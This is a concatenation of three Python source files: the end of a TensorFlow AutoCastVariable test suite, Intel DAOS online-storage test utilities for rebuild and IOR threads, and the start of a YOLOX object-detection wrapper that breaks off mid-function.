self.assertAlmostEqual(5, self.evaluate(x - 2))
self.assertAlmostEqual(6, self.evaluate(13 - x))
self.assertAlmostEqual(0, self.evaluate(x - x))
self.assertAlmostEqual(14, self.evaluate(x * 2))
self.assertAlmostEqual(21, self.evaluate(3 * x))
self.assertAlmostEqual(49, self.evaluate(x * x))
self.assertAlmostEqual(3.5, self.evaluate(x / 2))
self.assertAlmostEqual(1.5, self.evaluate(10.5 / x))
self.assertAlmostEqual(3, self.evaluate(x // 2))
self.assertAlmostEqual(2, self.evaluate(15 // x))
if read_dtype == tf.float32:
# The "mod" operator does not support float16
self.assertAlmostEqual(1, self.evaluate(x % 2))
self.assertAlmostEqual(2, self.evaluate(16 % x))
self.assertTrue(self.evaluate(x < 12))
self.assertTrue(self.evaluate(x <= 12))
self.assertFalse(self.evaluate(x > 12))
self.assertFalse(self.evaluate(x >= 12))
self.assertFalse(self.evaluate(12 < x))
self.assertFalse(self.evaluate(12 <= x))
self.assertTrue(self.evaluate(12 > x))
self.assertTrue(self.evaluate(12 >= x))
self.assertAlmostEqual(343, self.evaluate(pow(x, 3)), places=4)
self.assertAlmostEqual(128, self.evaluate(pow(2, x)), places=4)
self.assertAlmostEqual(-7, self.evaluate(-x))
self.assertAlmostEqual(7, self.evaluate(abs(x)))
x = get_var([7, 8, 9], tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
self.assertEqual(self.evaluate(x[1]), 8)
if tf.__internal__.tf2.enabled() and tf.executing_eagerly():
self.assertAllEqual(x == [7., 8., 10.], [True, True, False])
self.assertAllEqual(x != [7., 8., 10.], [False, False, True])
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_assign(self, distribution):
with distribution.scope():
x = get_var(0., tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
# outside of auto cast scope.
v1 = tf.constant(3., dtype=tf.float32)
v2 = tf.constant(3., dtype=tf.float16)
def run_and_check():
# Assign float32 values
self.assertAllClose(3., self.evaluate(x.assign(v1)))
self.assertAllClose(3. * 2, self.evaluate(x.assign_add(v1)))
self.assertAllClose(3., self.evaluate(x.assign_sub(v1)))
# Attempt to assign float16 values
with self.assertRaisesRegex(
ValueError,
'conversion requested dtype float32 for Tensor with dtype float16'):
self.evaluate(x.assign(v2))
with self.assertRaisesRegex(
ValueError,
'conversion requested dtype float32 for Tensor with dtype float16'):
self.evaluate(x.assign_add(v2))
with self.assertRaisesRegex(
ValueError,
'conversion requested dtype float32 for Tensor with dtype float16'):
self.evaluate(x.assign_sub(v2))
# Assign Python floats
self.assertAllClose(0., self.evaluate(x.assign(0.)))
self.assertAllClose(3., self.evaluate(x.assign(3.)))
self.assertAllClose(3. * 2, self.evaluate(x.assign_add(3.)))
self.assertAllClose(3., self.evaluate(x.assign_sub(3.)))
# Assign multiple times
# This currently doesn't work in graph mode if a strategy is used
if not tf.distribute.has_strategy() or tf.executing_eagerly():
assign = x.assign(1.)
self.assertAllClose(1., self.evaluate(assign))
self.assertAllClose(0., self.evaluate(assign.assign(0.)))
assign_add = x.assign_add(3.)
self.assertAllClose(3., self.evaluate(assign_add))
self.assertAllClose(3. * 3,
self.evaluate(x.assign_add(3.).assign_add(3.)))
self.assertAllClose(3. * 3, x)
assign_sub = x.assign_sub(3.)
self.assertAllClose(3. * 2, self.evaluate(assign_sub))
self.assertAllClose(0.,
self.evaluate(x.assign_sub(3.).assign_sub(3.)))
# Assign with read_value=False
self.assertIsNone(self.evaluate(x.assign(1., read_value=False)))
self.assertAllClose(1., self.evaluate(x))
self.assertIsNone(self.evaluate(x.assign_add(2., read_value=False)))
self.assertAllClose(3., self.evaluate(x))
self.assertIsNone(self.evaluate(x.assign_sub(3., read_value=False)))
self.assertAllClose(0., self.evaluate(x))
# Use the tf.assign functions instead of the var.assign methods.
self.assertAllClose(0., self.evaluate(tf.compat.v1.assign(x, 0.)))
self.assertAllClose(3., self.evaluate(tf.compat.v1.assign(x, 3.)))
self.assertAllClose(3. * 2,
self.evaluate(tf.compat.v1.assign_add(x, 3.)))
self.assertAllClose(3., self.evaluate(tf.compat.v1.assign_sub(x, 3.)))
run_and_check()
# reset x
self.evaluate(x.assign(0.))
# within auto cast scope.
with autocast_variable.enable_auto_cast_variables(tf.float16):
# assign still expect float32 value even if in float16 scope
run_and_check()
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_assign_tf_function(self, distribution):
if not tf.executing_eagerly():
self.skipTest('Test is not compatible with graph mode')
with distribution.scope():
x = get_var(0., tf.float32)
x = autocast_variable.create_autocast_variable(x)
@tf.function
def run_assign():
return x.assign(1.).assign_add(3.).assign_add(3.).assign_sub(2.)
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.assertAllClose(5., self.evaluate(run_assign()))
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_assign_op(self, distribution):
with distribution.scope():
x = get_var(0., tf.float32)
x = autocast_variable.create_autocast_variable(x)
@tf.function
def func():
self.assertIsNotNone(x.assign(1.0).op)
self.assertIsNotNone(x.assign_add(1.0).op)
self.assertIsNotNone(x.assign_sub(1.0).op)
func()
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_tf_function_control_dependencies(self, distribution):
if not tf.executing_eagerly():
self.skipTest('Test is not compatible with graph mode')
with distribution.scope():
x = get_var(0., tf.float32)
x = autocast_variable.create_autocast_variable(x)
@tf.function
def func():
update = x.assign_add(1.)
with tf.control_dependencies([update]):
x.assign_add(1.)
func()
self.assertAllClose(2., self.evaluate(x))
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_assign_stays_in_true_dtype(self, distribution):
with distribution.scope():
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
# small_val is a value such that 1.0 + small_val == 1.0 in fp16, but not
# in fp32
small_val = np.finfo('float16').eps / 2
small_tensor = tf.constant(small_val, dtype=tf.float32)
with autocast_variable.enable_auto_cast_variables(tf.float16):
# Variable should be increased, despite it appearing to be the same
# float16 value.
self.evaluate(x.assign(1. + small_tensor))
self.assertEqual(1., self.evaluate(x.value()))
self.assertEqual(1. + small_val, self.evaluate(x))
self.evaluate(x.assign(1.))
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.evaluate(x.assign_add(small_tensor))
self.assertEqual(1., self.evaluate(x.value()))
self.assertEqual(1. + small_val, self.evaluate(x))
def test_thread_local_autocast_dtype(self):
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.assertEqual(tf.identity(x).dtype, tf.float16)
# New threads should not see the modified value of the autocast dtype.
var_dtype = None
def f():
nonlocal var_dtype
var_dtype = x._cast_dtype
thread = threading.Thread(target=f)
thread.start()
thread.join()
self.assertEqual(var_dtype, tf.float32)
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_checkpoint(self, distribution):
with self.test_session():
with distribution.scope():
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
self.evaluate(x.assign(123.))
checkpoint = tf.train.Checkpoint(x=x)
prefix = os.path.join(self.get_temp_dir(), 'ckpt')
save_path = checkpoint.save(prefix)
self.evaluate(x.assign(234.))
checkpoint.restore(save_path).assert_consumed().run_restore_ops()
self.assertEqual(self.evaluate(x), 123.)
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_invalid_wrapped_variable(self, distribution):
with distribution.scope():
# Wrap a non-variable
with self.assertRaisesRegex(ValueError, 'variable must be of type'):
x = tf.constant([1.], dtype=tf.float32)
autocast_variable.create_autocast_variable(x)
# Wrap a non-floating point variable
with self.assertRaisesRegex(ValueError,
'variable must be a floating point'):
x = get_var(1, tf.int32)
autocast_variable.create_autocast_variable(x)
def test_repr(self):
# We do not test with DistributionStrategy because we do not want to rely on
# the exact __repr__ output of a DistributedVariable.
x = get_var(1., tf.float32, name='x')
x = autocast_variable.create_autocast_variable(x)
if tf.executing_eagerly():
self.assertStartsWith(
repr(x),
"<AutoCastVariable 'x:0' shape=() dtype=float32 "
"dtype_to_cast_to=float32, numpy="
)
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.assertStartsWith(
repr(x),
"<AutoCastVariable 'x:0' shape=() dtype=float32 "
"dtype_to_cast_to=float16, numpy="
)
else:
self.assertEqual(
repr(x),
"<AutoCastVariable 'x:0' shape=() dtype=float32 "
"dtype_to_cast_to=float32>"
)
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.assertEqual(
repr(x),
"<AutoCastVariable 'x:0' shape=() dtype=float32 "
"dtype_to_cast_to=float16>"
)
def test_repr_distributed(self):
strategy = tf.distribute.MirroredStrategy(['/cpu:1', '/cpu:2'])
with strategy.scope():
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
use_policy = getattr(strategy.extended, '_use_var_policy', False)
if use_policy:
self.assertRegex(
repr(x).replace('\n', ' '),
'<AutoCastDistributedVariable dtype=float32 '
'dtype_to_cast_to=float32 '
'inner_variable=DistributedVariable.*>')
else:
self.assertRegex(
repr(x).replace('\n', ' '),
'<AutoCastDistributedVariable dtype=float32 '
'dtype_to_cast_to=float32 '
'inner_variable=MirroredVariable.*>')
@parameterized.named_parameters(
('v1', tf.compat.v1.train.GradientDescentOptimizer),
('v2', gradient_descent_v2.SGD))
def test_optimizer(self, optimizer_class):
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
opt = optimizer_class(1.)
@tf.function
def f():
opt.minimize(lambda: x + 1., var_list=[x])
if tf.executing_eagerly():
f()
else:
op = f() # pylint: disable=assignment-from-no-return
self.evaluate(tf.compat.v1.global_variables_initializer())
self.evaluate(op)
self.assertEqual(self.evaluate(x), 0)
if __name__ == '__main__':
tf.test.main()
|
osa_utils.py
|
#!/usr/bin/python
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import ctypes
import queue
import time
import threading
import re
from avocado import fail_on
from ior_test_base import IorTestBase
from mdtest_test_base import MdtestBase
from command_utils import CommandFailure
from pydaos.raw import (DaosContainer, IORequest,
DaosObj, DaosApiError)
from general_utils import create_string_buffer
class OSAUtils(MdtestBase, IorTestBase):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
daos_server offline drain test cases.
:avocado: recursive
"""
def setUp(self):
"""Set up for test case."""
super().setUp()
self.pool_cont_dict = {}
self.container = None
self.obj = None
self.ioreq = None
self.dmg_command = self.get_dmg_command()
self.no_of_dkeys = self.params.get("no_of_dkeys", '/run/dkeys/*',
default=[0])[0]
self.no_of_akeys = self.params.get("no_of_akeys", '/run/akeys/*',
default=[0])[0]
self.record_length = self.params.get("length", '/run/record/*',
default=[0])[0]
self.ior_w_flags = self.params.get("write_flags", '/run/ior/iorflags/*',
default="")
self.ior_r_flags = self.params.get("read_flags", '/run/ior/iorflags/*')
self.out_queue = queue.Queue()
self.dmg_command.exit_status_exception = False
self.test_during_aggregation = False
self.test_during_rebuild = False
self.test_with_checksum = True
@fail_on(CommandFailure)
def get_pool_leader(self):
"""Get the pool leader.
Returns:
int: pool leader value
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return int(data["response"]["leader"])
@fail_on(CommandFailure)
def get_rebuild_status(self):
"""Get the rebuild status.
Returns:
str: rebuild status
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return data["response"]["rebuild"]["status"]
@fail_on(CommandFailure)
def get_rebuild_state(self):
"""Get the rebuild state.
Returns:
str: rebuild state
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return data["response"]["rebuild"]["state"]
@fail_on(CommandFailure)
def is_rebuild_done(self, time_interval,
wait_for_rebuild_to_complete=False):
"""Rebuild is completed/done.
Args:
time_interval: Wait interval between checks
wait_for_rebuild_to_complete: Rebuild completed
(Default: False)
"""
self.pool.wait_for_rebuild(wait_for_rebuild_to_complete,
interval=time_interval)
@fail_on(CommandFailure)
def assert_on_rebuild_failure(self):
"""If the rebuild is not successful,
raise assert.
"""
rebuild_status = self.get_rebuild_status()
self.log.info("Rebuild Status: %s", rebuild_status)
rebuild_failed_string = ["failed", "scanning", "aborted", "busy"]
self.assertTrue(rebuild_status not in rebuild_failed_string,
"Rebuild failed")
@fail_on(CommandFailure)
def print_and_assert_on_rebuild_failure(self, out, timeout=3):
"""Print the out value (daos, dmg, etc) and check for rebuild
completion. If not, raise assert.
"""
self.log.info(out)
self.is_rebuild_done(timeout)
self.assert_on_rebuild_failure()
@fail_on(CommandFailure)
def get_pool_version(self):
"""Get the pool version.
Returns:
int: pool_version_value
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return int(data["response"]["version"])
def set_container(self, container):
"""Set the OSA utils container object.
Args:
container (obj) : Container object to be used
within OSA utils.
"""
self.container = container
def simple_exclude_reintegrate_loop(self, rank, loop_time=100):
"""This method performs exclude and reintegration on a rank,
for a certain amount of time.
"""
start_time = 0
finish_time = 0
while int(finish_time - start_time) > loop_time:
start_time = time.time()
output = self.dmg_command.pool_exclude(self.pool.uuid,
rank)
self.print_and_assert_on_rebuild_failure(output)
output = self.dmg_command.pool_reintegrate(self.pool.uuid,
rank)
self.print_and_assert_on_rebuild_failure(output)
@fail_on(DaosApiError)
def write_single_object(self):
"""Write some data to the existing pool."""
self.pool.connect(2)
csum = self.params.get("enable_checksum", '/run/container/*')
self.container = DaosContainer(self.context)
input_param = self.container.cont_input_values
input_param.enable_chksum = csum
self.container.create(poh=self.pool.pool.handle,
con_prop=input_param)
self.container.open()
self.obj = DaosObj(self.context, self.container)
self.obj.create(objcls=1)
self.obj.open()
self.ioreq = IORequest(self.context,
self.container,
self.obj, objtype=4)
self.log.info("Writing the Single Dataset")
for dkey in range(self.no_of_dkeys):
for akey in range(self.no_of_akeys):
indata = ("{0}".format(str(akey)[0])
* self.record_length)
d_key_value = "dkey {0}".format(dkey)
c_dkey = create_string_buffer(d_key_value)
a_key_value = "akey {0}".format(akey)
c_akey = create_string_buffer(a_key_value)
c_value = create_string_buffer(indata)
c_size = ctypes.c_size_t(ctypes.sizeof(c_value))
self.ioreq.single_insert(c_dkey, c_akey, c_value, c_size)
self.obj.close()
self.container.close()
@fail_on(DaosApiError)
def verify_single_object(self):
"""Verify the container data on the existing pool."""
self.pool.connect(2)
self.container.open()
self.obj.open()
self.log.info("Single Dataset Verification -- Started")
for dkey in range(self.no_of_dkeys):
for akey in range(self.no_of_akeys):
indata = ("{0}".format(str(akey)[0]) *
self.record_length)
c_dkey = create_string_buffer("dkey {0}".format(dkey))
c_akey = create_string_buffer("akey {0}".format(akey))
val = self.ioreq.single_fetch(c_dkey,
c_akey,
len(indata)+1)
if indata != (repr(val.value)[1:-1]):
self.d_log.error("ERROR:Data mismatch for "
"dkey = {0}, "
"akey = {1}".format(
"dkey {0}".format(dkey),
"akey {0}".format(akey)))
self.fail("ERROR: Data mismatch for dkey = {0}, akey={1}"
.format("dkey {0}".format(dkey),
"akey {0}".format(akey)))
self.obj.close()
self.container.close()
def prepare_cont_ior_write_read(self, oclass, flags):
"""This method prepares the containers for
IOR write and read invocations.
To enable aggregation:
- Create two containers and read always from
first container
Normal usage (use only a single container):
- Create a single container and use the same.
Args:
oclass (str): IOR object class
flags (str): IOR flags
"""
self.log.info(self.pool_cont_dict)
# If pool is not in the dictionary,
# initialize its container list to None
# {poolA : [None, None], [None, None]}
if self.pool not in self.pool_cont_dict:
self.pool_cont_dict[self.pool] = [None] * 4
# Create container if the pool doesn't have one.
# Otherwise, use the existing container in the pool.
# pool_cont_dict {pool A: [containerA, Updated,
# containerB, Updated],
# pool B : containerA, Updated,
# containerB, None]}
if self.pool_cont_dict[self.pool][0] is None:
self.add_container(self.pool, create=False)
self.set_cont_class_properties(oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
self.container.create()
self.pool_cont_dict[self.pool][0] = self.container
self.pool_cont_dict[self.pool][1] = "Updated"
else:
if ((self.test_during_aggregation is True) and
(self.pool_cont_dict[self.pool][1] == "Updated") and
(self.pool_cont_dict[self.pool][3] is None) and
("-w" in flags)):
# Write to the second container
self.add_container(self.pool, create=False)
self.set_cont_class_properties(oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
self.container.create()
self.pool_cont_dict[self.pool][2] = self.container
self.pool_cont_dict[self.pool][3] = "Updated"
else:
self.container = self.pool_cont_dict[self.pool][0]
def delete_extra_container(self, pool):
"""Delete the extra container in the pool.
Refer prepare_cont_ior_write_read. This method
should be called when OSA tests intend to
enable aggregation.
Args:
pool (object): pool handle
"""
self.pool.set_property("reclaim", "time")
extra_container = self.pool_cont_dict[pool][2]
extra_container.destroy()
self.pool_cont_dict[pool][3] = None
def get_object_replica_value(self, oclass):
""" Get the object replica value for an object class.
Args:
oclass (str): Object Class (eg: RP_2G1,etc)
Returns:
value (int) : Object replica value
"""
value = 0
if "_" in oclass:
replica_list = oclass.split("_")
value = replica_list[1][0]
else:
self.log.info("Wrong Object Class. Cannot split")
return int(value)
def update_cont_properties(self, cont_prop):
"""Update the existing container properties.
Args:
cont_prop (str): Replace existing container properties
with new value
"""
self.container.properties.value = cont_prop
def set_cont_class_properties(self, oclass="S1"):
"""Update the container class to match the IOR object
class. Fix the rf factor based on object replica value.
Also, remove the redundancy factor for S type
object class.
Args:
oclass (str, optional): Container object class to be set.
Defaults to "S1".
"""
self.container.oclass.value = oclass
# Set the container properties properly for S!, S2 class.
# rf should not be set to 1 for S type object class.
x = re.search("^S\\d$", oclass)
prop = self.container.properties.value
if x is not None:
prop = prop.replace("rf:1", "rf:0")
else:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
prop = prop.replace("rf:1", rf_value)
self.container.properties.value = prop
def assert_on_exception(self, out_queue=None):
"""Assert on exception while executing an application.
Args:
out_queue (queue): Check whether the queue is
empty. If empty, app (ior, mdtest) didn't encounter error.
"""
if out_queue is None:
out_queue = self.out_queue
if out_queue.empty():
pass
else:
exc = out_queue.get(block=False)
out_queue.put(exc)
raise exc
def cleanup_queue(self, out_queue=None):
"""Cleanup the existing thread queue.
Args:
out_queue (queue): Queue to cleanup.
"""
if out_queue is None:
out_queue = self.out_queue
while not out_queue.empty():
out_queue.get(block=True)
def run_ior_thread(self, action, oclass, test,
single_cont_read=True,
fail_on_warning=True):
"""Start the IOR thread for either writing or
reading data to/from a container.
Args:
action (str): Start the IOR thread with Read or
Write
oclass (str): IOR object class
test (list): IOR test sequence
flags (str): IOR flags
single_cont_read (bool) : Always read from the
1st container.
Defaults to True.
fail_on_warning (bool) : Test terminates
for IOR warnings.
Defaults to True.
"""
self.cleanup_queue()
if action == "Write":
flags = self.ior_w_flags
else:
flags = self.ior_r_flags
# Add a thread for these IOR arguments
process = threading.Thread(target=self.ior_thread,
kwargs={"pool": self.pool,
"oclass": oclass,
"test": test,
"flags": flags,
"single_cont_read":
single_cont_read,
"fail_on_warning":
fail_on_warning})
# Launch the IOR thread
process.start()
# Wait for the thread to finish
try:
process.join()
except CommandFailure as err_msg:
self.out_queue.put(err_msg)
self.assert_on_exception()
def ior_thread(self, pool, oclass, test, flags,
single_cont_read=True,
fail_on_warning=True):
"""Start an IOR thread.
Args:
pool (object): pool handle
oclass (str): IOR object class, container class.
test (list): IOR test sequence
flags (str): IOR flags
single_cont_read (bool) : Always read from the
1st container.
Defaults to True.
fail_on_warning (bool) : Test terminates
for IOR warnings.
Defaults to True.
"""
self.cleanup_queue()
self.pool = pool
self.ior_cmd.get_params(self)
self.ior_cmd.set_daos_params(self.server_group, self.pool)
self.ior_cmd.dfs_oclass.update(oclass)
self.ior_cmd.dfs_dir_oclass.update(oclass)
if single_cont_read is True:
# Prepare the containers created and use in a specific
# way defined in prepare_cont_ior_write.
self.prepare_cont_ior_write_read(oclass, flags)
elif single_cont_read is False and self.container is not None:
# Here self.container is having actual value. Just use it.
self.log.info(self.container)
else:
self.fail("Not supported option on ior_thread")
try:
job_manager = self.get_ior_job_manager_command()
except CommandFailure as err_msg:
self.out_queue.put(err_msg)
self.assert_on_exception()
job_manager.job.dfs_cont.update(self.container.uuid)
self.ior_cmd.transfer_size.update(test[2])
self.ior_cmd.block_size.update(test[3])
self.ior_cmd.flags.update(flags)
try:
self.run_ior_with_pool(create_pool=False, create_cont=False,
fail_on_warning=fail_on_warning)
except CommandFailure as err_msg:
self.out_queue.put(err_msg)
self.assert_on_exception()
def run_mdtest_thread(self):
"""Start mdtest thread and wait until thread completes.
"""
# Create container only
self.mdtest_cmd.dfs_destroy = False
if self.container is None:
self.add_container(self.pool, create=False)
self.set_cont_class_properties(self.mdtest_cmd.dfs_oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(self.mdtest_cmd.dfs_oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
self.container.create()
job_manager = self.get_mdtest_job_manager_command(self.manager)
job_manager.job.dfs_cont.update(self.container.uuid)
# Add a thread for these IOR arguments
process = threading.Thread(target=self.execute_mdtest)
# Launch the MDtest thread
process.start()
# Wait for the thread to finish
try:
process.join()
except CommandFailure as err_msg:
self.out_queue.put(err_msg)
self.assert_on_exception()
|
detect.py
|
"""
author: LSH9832
reference: https://github.com/Megvii-BaseDetection/YOLOX
"""
import os
import cv2
import torch
import sys
import argparse
import yaml
this_path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(this_path) if not this_path in sys.path else None #print('start from this project dir')
import yolox.exp
from yolox.data.data_augment import ValTransform
from yolox.data.datasets import COCO_CLASSES
from yolox.utils import fuse_model, postprocess, vis
def make_parser():
parser = argparse.ArgumentParser("yolox detect parser")
parser.add_argument("-s", "--source", type=str or int, default=source, help="source")
parser.add_argument("-t", "--source-type", type=str, default=source_type, help="source type: cam, vid, image, image_dir")
parser.add_argument("-p", "--pause", default=bool(start_with_pause), action='store_true', help="start with pause")
parser.add_argument("-m", "--multi", default=False, action='store_true', help="run with multiprocess")
return parser
class Colors:
def __init__(self):
hex = ('FF3838', 'FF9D97', 'FF701F', 'FFB21D', 'CFD231', '48F90A', '92CC17', '3DDB86', '1A9334', '00D4BB',
'2C99A8', '00C2FF', '344593', '6473FF', '0018EC', '8438FF', '520085', 'CB38FF', 'FF95C8', 'FF37C7')
self.palette = [self.hex2rgb('#' + c) for c in hex]
self.n = len(self.palette)
def __call__(self, i, bgr=False):
c = self.palette[int(i) % self.n]
return (c[2], c[1], c[0]) if bgr else c
@staticmethod
def hex2rgb(h):
return tuple(int(h[1 + i:1 + i + 2], 16) for i in (0, 2, 4))
colors = Colors()
def plot_one_box(x, im, color=(128, 128, 128), label=None, line_thickness=3):
# Plots one bounding box on image 'im' using OpenCV
assert im.data.contiguous, 'Image not contiguous. Apply np.ascontiguousarray(im) to plot_on_box() input image.'
tl = line_thickness or round(0.002 * (im.shape[0] + im.shape[1]) / 2) + 1 # line/font thickness
c1, c2 = (int(x[0]), int((x[1]))), (int(x[2]), int((x[3])))
# print(c1,c2)
cv2.rectangle(im, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], (c1[1] - t_size[1] - 3) if (c1[1] - t_size[1] - 3) > 0 else (c1[1] + t_size[1] + 3)
cv2.rectangle(im, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(im, label, (c1[0], c1[1] - 2) if (c1[1] - t_size[1] - 3) > 0 else (c1[0], c2[1] - 2), 0, tl / 3,
[225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def draw_bb(img, pred, names, type_limit=None, line_thickness=2):
if type_limit is None:
type_limit = names
for *xyxy, conf0, conf1, cls in pred:
conf = conf0 * conf1
if names[int(cls)] in type_limit:
label = f'{names[int(cls)]} {conf:.2f}'
plot_one_box(xyxy, img, label=label, color=colors(int(cls), True), line_thickness=line_thickness)
class DirCapture(object):
"""read image file from a dir containing images or a image file"""
__cv2 = cv2
__support_type = ['jpg', 'jpeg', 'png', 'bmp']
__img_list = []
def __init__(self, path: str = None):
if path is not None:
self.open(path)
def open(self, path):
self.__img_list = []
if os.path.isdir(path):
path = path[:-1] if path.endswith('/') else path
assert os.path.isdir(path)
from glob import glob
for img_type in self.__support_type:
self.__img_list += sorted(glob('%s/*.%s' % (path, img_type)))
elif os.path.isfile(path) and '.' in path and path.split('.')[-1] in self.__support_type:
self.__img_list = [path]
else:
print('wrong input')
self.__img_list = []
def isOpened(self):
return bool(len(self.__img_list))
def read(self):
this_img_name = self.__img_list[0]
del self.__img_list[0]
img = self.__cv2.imread(this_img_name)
success = img.size > 0
return success, img
def release(self):
self.__img_list = []
class Predictor(object):
def __init__(
self,
model,
exp,
cls_names=COCO_CLASSES, # 类型名称
trt_file=None, # tensorRT File
decoder=None, # tensorRT decoder
device="cpu",
fp16=False, # 使用混合精度评价
legacy=False, # 与旧版本兼容
):
self.model = model
self.cls_names = cls_names
self.decoder = decoder
self.num_classes = exp.num_classes
self.confthre = exp.test_conf
self.nmsthre = exp.nmsthre
self.test_size = exp.test_size
self.device = device
self.fp16 = fp16
self.preproc = ValTransform(legacy=legacy)
if trt_file is not None:
from torch2trt import TRTModule
model_trt = TRTModule()
model_trt.load_state_dict(torch.load(trt_file))
x = torch.ones(1, 3, exp.test_size[0], exp.test_size[1]).cuda()
self.model(x)
self.model = model_trt
def inference(self, img):
if isinstance(img, str):
img = cv2.imread(img)
ratio = min(self.test_size[0] / img.shape[0], self.test_size[1] / img.shape[1])
img, _ = self.preproc(img, None, self.test_size)
img = torch.from_numpy(img).unsqueeze(0)
img = img.float()
if self.device == "gpu":
img = img.cuda()
if self.fp16:
img = img.half() # to FP16
with torch.no_grad():
outputs = self.model(img)
if self.decoder is not None:
outputs = self.decoder(outputs, dtype=outputs.type())
outputs = postprocess(
outputs, self.num_classes, self.confthre,
self.nmsthre, class_agnostic=True
)
if outputs[0] is not None:
outputs = outputs[0].cpu().numpy()
outputs[:, 0:4] /= ratio
else:
outputs = []
return outputs
class listString(str):
def __init__(self, this_string: str = ''):
super(listString, self).__init__()
self.__this_string = this_string
# self.__all__ = ['append', ]
def __getitem__(self, index):
return self.__this_string[index]
def __repr__(self):
return self.__this_string
def __len__(self):
return len(self.__this_string)
def append(self, add_string):
self.__this_string += add_string
class Detector(object):
__model_size_all = ['s', 'm', 'l', 'x', 'tiny', 'nano', 'v3']
__device = 'cpu'
__model = None # 模型
__model_size = None # 模型大小(s,m,l,x, tiny, nano, v3)
__model_path = None # 模型权重文件位置
__class_names = COCO_CLASSES # 类别名称
__detector = None # 检测器
__exp = None
__fp16 = False
__fuse = False
__useTRT = False # 使用TensorRT
__legacy = False # To be compatible with older versions
__auto_choose_device = True
__tsize = 640
__conf = 0.25
__nms = 0.5
__result = None
__img_info = None
def __init__(
self,
model_path: str or None = None, # 模型权重文件位置
model_size: str or None = None, # 模型大小(s,m,l,x,tiny,)
class_path: str or None = None, # 类别文件位置
conf: float or None = None, # 置信度阈值
nms: float or None = None, # 非极大值抑制阈值
autoChooseDevice: bool = True, # 自动选择运行的设备(CPU,GPU)
):
self.__model_path = model_path
self.__model_size = model_size
self.__auto_choose_device = autoChooseDevice
self.reloadModel = self.loadModel
if class_path is not None:
self.__load_class(class_path)
if conf is not None:
self.__conf = conf
if nms is not None:
self.__nms = nms
self.__check_input()
# self.
#######################################################################################################
# private function
def __load_class(self, path):
if os.path.exists(path):
data = open(path).readlines()
classes = []
[classes.append(this_class[:-1] if this_class.endswith('\n') else this_class)
if len(this_class) else None
for this_class in data]
self.__class_names = classes
def __check_input(self):
if self.__model_path is not None:
this_error = '[model path input error]: Type of model path should be "string"!'
assert type(self.__model_path) == str, this_error
# print(self.__model_path)
assert self.__model_path.endswith('.pth'), '[model path type error]:not a weight file'
if self.__model_size is not None:
allSizeStr = listString('[model path input error]: Available model size: ')
[allSizeStr.append('%s, ' % this_size) for this_size in self.__model_size_all]
assert self.__model_size in self.__model_size_all, '%s' % allSizeStr
def __cuda(self):
assert torch.cuda.is_available()
assert self.__model is not None
self.__model.cuda()
if self.__fp16:
self.__model.half()
self.__model.eval()
def __cpu(self):
assert self.__model is not None
self.__model.cpu()
self.__model.eval()
#######################################################################################################
# public function
def get_all_classes(self):
return self.__class_names
################################################################################
"""
you can use the following setting functions only before loading model, or you should reload model
"""
def setModelPath(self, model_path: str) -> None:
self.__model_path = model_path
self.__check_input()
def setModelSize(self, model_size: str) -> None:
self.__model_size = model_size
self.__check_input()
def setClassPath(self, class_path: str) -> None:
self.__load_class(class_path)
def setAutoChooseDevice(self, flag: bool) -> None:
self.__auto_choose_device = flag
def setFuse(self, flag: bool) -> None:
self.__fuse = flag
def setLegacy(self, flag: bool) -> None:
self.__legacy = flag
def setDevice(self, device: str) -> None:
assert device in ['cpu', 'gpu'], '[Device name error]: No device named %s' % device
self.__device = device
def setTsize(self, size: int) -> None:
self.__tsize = size
def setUseTRT(self, flag:bool):
self.__useTRT = flag
def setFp16(self, flag:bool):
self.__fp16 = flag
################################################################################
"""
you can use the following setting functions after loading model
"""
def setConf(self, conf: float) -> None:
self.__conf = conf
if self.__detector is not None:
self.__detector.confthre = conf
def setNms(self, nms: float) -> None:
self.__nms = nms
if self.__detector is not None:
self.__detector.nmsthre = nms
################################################################################
def loadModel(self) -> None:
assert self.__model_size is not None, 'model size not declared'
assert self.__model_path is not None, 'model path not declared'
# 载入网络结构
self.__exp = yolox.exp.build.get_exp_by_name('yolox-%s' % self.__model_size)
